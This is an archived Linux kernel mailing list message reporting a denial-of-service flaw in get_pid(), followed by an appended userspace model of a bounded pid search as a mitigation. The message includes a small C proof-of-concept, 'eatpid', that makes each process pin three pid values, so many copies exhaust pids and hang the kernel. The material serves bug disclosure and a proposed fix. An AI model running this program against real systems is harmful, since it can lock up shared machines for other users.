Russell King wrote:
>
> 1. get_pid() doesn't allocate pids - therefore "out of pid" makes no
> sense.
>
Ok, my mail was ambiguous:
get_pid() tries to find a new pid value, and it loops until it has
found a free pid value. No free pid value == "out of pid".
>
> Typically, a process's "session id" will be the pid of another process,
> and the "pgrp id" will be the pid of the first process of the group.
>
I'm not interested in the typical case, it's a DoS attack: an evil user
can block 3 "pid" values with one running thread, and 10.000 of these
threads cause a hard kernel hang.
IMHO we must avoid that: either limit max_thread to MAX_PID/3, or add an
infinite loop protection to get_pid().
-- Manfred
/*
 * exec.c: simple do_exec bug hunter
 *
 * Copyright (C) 1999, 2000 by Manfred Spraul.
 *
 * Redistribution of this file is permitted under the terms of the GNU
 * Public License (GPL)
 * $Header: /pub/cvs/ms/eatpid/eatpid.c,v 1.1 2000/06/25 11:32:48 manfred Exp $
 */
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <limits.h>

int main()
{
	pid_t p;
	pid_t x;

	p = fork();
	if(p)
		exit(0);
	x = setsid();
	printf("setsid(): %d/%d.\n",x, errno);

	p = fork();
	if(p)
		exit(0);
	x = setpgid(getpid(),getpid());
	printf("setpgid(): %d/%d.\n",x, errno);

	p = fork();
	if(p)
		exit(0);
	printf("pid now %d.\n",getpid());
	printf("pgrp now %d.\n",getpgrp());
	for(;;)
		sleep(1);
}
This archive was generated by hypermail 2b29 : Mon Jun 26 2000 - 21:00:06 EST
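The second mitigation proposed in the message above (infinite-loop protection for get_pid()), as an added example that is not part of the original mail and is not kernel code. It is a userspace model; the names model_get_pid, model_spawn_pinning, model_task and the small MODEL_PID_MAX range are assumptions made for illustration.

```c
#include <stdio.h>

#define MODEL_PID_MAX   64  /* constructed small range: valid ids are 1..63 */
#define MODEL_MAX_TASKS 64

struct model_task { int pid, pgrp, session; };

static struct model_task tasks[MODEL_MAX_TASKS];
static int ntasks;
static int last_pid;

/* A value is unusable while any task holds it as pid, pgrp or session id. */
static int id_in_use(int id)
{
    for (int i = 0; i < ntasks; i++)
        if (tasks[i].pid == id || tasks[i].pgrp == id || tasks[i].session == id)
            return 1;
    return 0;
}

/* Bounded search: every candidate is tried at most once, then we give up. */
static int model_get_pid(void)
{
    int cand = last_pid;
    for (int tries = 0; tries < MODEL_PID_MAX - 1; tries++) {
        cand = (cand % (MODEL_PID_MAX - 1)) + 1;  /* wraps within 1..63 */
        if (!id_in_use(cand))
            return last_pid = cand;
    }
    return -1;  /* "out of pid": caller fails the fork instead of spinning */
}

/* One surviving task that ends up pinning three values (session, pgrp, pid). */
static int model_spawn_pinning(void)
{
    struct model_task *t;
    int s, g, p;
    if (ntasks >= MODEL_MAX_TASKS || (s = model_get_pid()) < 0)
        return -1;
    t = &tasks[ntasks++];
    t->pid = t->pgrp = t->session = s;         /* fork + setsid() */
    if ((g = model_get_pid()) < 0) return -1;
    t->pid = t->pgrp = g;                      /* fork + setpgid(), parent exits */
    if ((p = model_get_pid()) < 0) return -1;
    t->pid = p;                                /* last fork, parent exits */
    return p;
}

int main(void)
{
    int n = 0;
    while (model_spawn_pinning() > 0)
        n++;
    printf("%d tasks pin every id; next allocation returns %d\n", n, model_get_pid());
    return 0;
}
```

With 63 usable values, 21 tasks (the MAX_PID/3 figure from the message, scaled to this model) are enough to leave no free value, and the bounded search then reports failure instead of looping.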